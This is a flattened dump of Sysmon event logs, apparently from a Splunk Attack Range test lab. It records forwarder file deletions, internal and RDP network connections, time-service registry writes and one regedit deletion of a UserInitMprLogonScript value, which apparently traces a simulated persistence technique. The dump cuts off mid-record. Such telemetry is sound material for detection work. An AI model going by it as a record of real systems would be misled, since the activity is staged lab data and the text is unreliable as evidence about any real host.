AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60508-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981916Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:56.447{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8C04EC629D0C2AD4322CCB510348760D,SHA256=5A9E057E3AD86A9BC4BD87F38160BBABCF5C77ABE56D4EF9A39440789A978B9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981915Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:56.447{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8AC1655ACAA89EC48B40BB8F65AF21A7,SHA256=641064C8337C7E0C77552C5DDCAC6DD8281F9077BF21672A68E9C88611CAC30D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981921Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:57.900{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7B7A33B479B9C27C82B09000740E255,SHA256=F14109CFDD695659032A2042ACA657828223844F530AC8A87D8342434CF75526,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057560Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:57.862{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC6CE053CB866EF65A791533244FCC38,SHA256=18A96FD0D15F588816C1E23550A768E4E67F995081643A5F92C900FDB7DDFB7F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981920Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:54.832{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59577-false10.0.1.12-8000- 354300x8000000000000000981919Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:54.594{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-61367-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001057562Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:58.893{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C22F9878A14E72E223EE13BE0B7E312D,SHA256=8CAF946A34D1899DF6C030FCFA31CC588E17A48AF4E25517DB1EE7523DCD5903,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057561Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:56.177{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54300-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057563Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:59.940{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6991669FA7211BE96694F996DA3CB520,SHA256=13DDCE5607279BDD56DCE14032F5E913EBB4CC5AB6361AA1B4B86E2836183C0B,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000981933Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:26:59.884{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000981932Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:26:59.884{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0fdc13d2) 13241300x8000000000000000981931Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:26:59.884{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b379-0x70a07d02) 13241300x8000000000000000981930Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:26:59.884{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b381-0xd264e502) 13241300x8000000000000000981929Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:26:59.884{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b38a-0x34294d02) 13241300x8000000000000000981928Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:26:59.884{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000981927Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:26:59.884{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0fdc13d2) 13241300x8000000000000000981926Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:26:59.884{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b379-0x70a07d02) 13241300x8000000000000000981925Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:26:59.884{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b381-0xd264e502) 13241300x8000000000000000981924Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:26:59.884{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b38a-0x34294d02) 354300x8000000000000000981923Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:56.871{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62806-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981922Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:59.134{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C7D404C95BD15BBFB93DED43A3D64AE,SHA256=6FDB9FE7EC10941E4267336140CD98E3FA8A76F689FE9172D2C148E2AF96EA60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981935Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:00.525{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8C04EC629D0C2AD4322CCB510348760D,SHA256=5A9E057E3AD86A9BC4BD87F38160BBABCF5C77ABE56D4EF9A39440789A978B9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981934Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:00.369{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9624273D781B6D9C003E99952B6F4967,SHA256=20588F943AA5AF89C0640174A339C36B49FAFD542859723B33A23C22BFAE231F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057564Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:00.612{5EBD8912-8CC0-6151-1100-00000000FD01}412NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=9EBA256F0937BA9B4B97E92E10458167,SHA256=38821A8B8BF0873616A791578F17D53D0A5801C3C91F97785D527CC398459205,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981936Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:01.384{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72229A084AC861A72C70E4D89466B1DE,SHA256=935085A34F1840AA028A4CF54FDDD73DBDC1D31DBCCF34D992FE6B6107F215C6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057568Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:59.658{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63863-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057567Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:01.080{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=586B4D429FA737D560D42172BA193701,SHA256=723A4AC04459D04B18BD48A2976E2BA7B1F606DE1D97A3BEFBA0D3E9AC872248,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057566Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:01.080{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=255F4A6A860424EEAAF2562C8634257F,SHA256=03C49B1B1B77D16C363303DBDCD9894CA8C51E3021C134B33757A28B0C20E46D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057565Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:01.034{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33ADD6A60E0E7317B1D4E34FB7D859E9,SHA256=52107561A8DF82E2A74ECDA9650F9CC38B926EF872DFF531D45A70035F4521CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981939Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:00.168{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63703-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981938Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:02.900{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=188CC80227F544B19B157BC6667F96EE,SHA256=6A3D19C552DCA790C9581FDCC15E4C60A56C0D92EC8ACE4EC0D49CB161FDFD21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981937Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:02.400{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5ABECBBBD8449301665540FB18577759,SHA256=0E30BEF923BECE1FA8AE30909EA8D5C91E6DF436670EDC48E2B42F15A2E4D2C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057569Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:02.034{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5EC17A2BEB5CDBB436E2BE0B0AC5389,SHA256=404627D4D7112F855AF7075422B01649701A514E8898B23A5CB1B28956960F0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981940Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:03.624{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60F3C6716440FD7CA69674D8A1830C61,SHA256=2EE238952949C22543A0C79B9063739931DF13ACE4B91AE7AAB31E4C739AB4BE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057571Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:02.115{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54301-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057570Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:03.049{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C50FB2243C2C39872C544D4EB844186A,SHA256=F1B327ED536A5B7DAD131F58CCD5C6117BD62588235670A10A85EE31E6E8E03C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981944Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:04.858{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0237D761C5903BBF97C856A59C9ACD3,SHA256=E903BE1E2A0049BB0097D4923F8DFA04BBDE99DE481E026905F03EE995877810,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057572Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:04.210{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76049B90A385E521FFF16EE568DF843B,SHA256=487BA30D506B7D600F2D8DA5D5B6373BBA092829211488A9AFE0C2EFCCCBF232,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981943Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:04.358{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B77AD96A5C03C4892F691CC430A4707B,SHA256=FF8FC8DB811AD386AD1767DAC767B1CFF00935A8DFF144DEF97FF81F8B89B3BF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981942Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:00.809{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de59923-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000981941Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:00.801{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59578-false10.0.1.12-8000- 23542300x80000000000000001057573Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:05.289{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=333FE47BAE4F132C4A90A6DF7F57C256,SHA256=D0575E7030AE59C397A959D00355A51D2BDB52C05C03ED1471400DDE22FBD7AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057574Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:06.320{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A769C819CB3FDA34A3A897DB96E34BE,SHA256=B6727B8BD511B7112128A70A3644BD65337EF1F053F4F52DB850F79F1BFC4B92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981945Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:05.999{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4276DECA9234FA3C013EE87D4E3B01D8,SHA256=B5B9E4DD001AB163BCAFD2B1F6C995746BD51B99F63E2E1162728077DF188866,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057575Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:07.320{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48089F00C699EF2DD739F8873A80B49C,SHA256=5BF0674ABF49B46E116FA8A7C67501E82480CCAF3AC5E43F89E0B0DD133DE1BC,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000981947Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:27:07.936{69CF5F33-7F28-614D-1100-00000000FD01}960C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b381-0xd78f5631) 23542300x8000000000000000981946Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:07.014{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=888AAC6AEC0E628C0A5728560B2D07F7,SHA256=F8043030E251D1940F9E4B00F3D2947A694F16B28EF09CE8B726C2CDE3A801AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057576Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:08.382{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CFE5E33F635D4E90060AB008DA536AA,SHA256=229D90DCF2308DA47E39E4DBD4609DDB845F6FF4EA2288F1648ED2568E346973,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981949Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:05.821{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59579-false10.0.1.12-8000- 23542300x8000000000000000981948Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:08.030{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EEC18A9E03EB3E909020D3633054FAE,SHA256=28DA98DC1C1E6423D4B954659684DDA098CBA31648E78244E662C9784C1BBD4F,IMPHASH=00000000000000000000000000000000falsetrue 12241200x80000000000000001057583Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-DeleteValue2021-09-27 09:27:09.898{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exeHKU\S-1-5-21-2741910449-3045839080-4200281267-500\Environment\UserInitMprLogonScript 10341000x80000000000000001057582Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:09.898{5EBD8912-8D2A-6151-9600-00000000FD01}46324940C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057581Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:09.898{5EBD8912-8D2A-6151-9600-00000000FD01}46324940C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057580Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:09.898{5EBD8912-8D2A-6151-9600-00000000FD01}46324940C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001057579Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:08.058{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54302-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001057578Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:07.761{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudpfalsefalse10.0.1.14win-dc-429.attackrange.local123ntpfalse10.0.1.15WIN-HOST-542123ntp 23542300x80000000000000001057577Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:09.586{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E244288390679DEC6613D5F7F4045B1,SHA256=133EFEF4237653D77E40BD55019FE5ED612D06412C47CAA211CFCAD7C3A42611,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981954Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:09.827{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program 